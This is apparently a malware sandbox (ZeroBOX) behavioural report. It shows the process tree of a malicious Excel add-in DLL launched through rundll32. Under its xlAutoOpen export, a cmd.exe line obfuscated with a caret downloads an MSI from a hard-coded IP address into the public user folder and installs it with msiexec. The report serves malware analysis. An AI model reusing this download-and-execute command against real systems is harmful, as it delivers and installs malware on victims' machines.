| ZeroBOX

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,hash
2616
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,hash
  2904
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,reverseString
2712
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,reverseString
  3032
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,xlAutoOpen
2804
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,xlAutoOpen
  2992
  - cmd.exe c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi
    940
    - curl.exe curl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0
      148
    - timeout.exe timeout 10
      2428
    - msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"
      2552
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,
2928

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis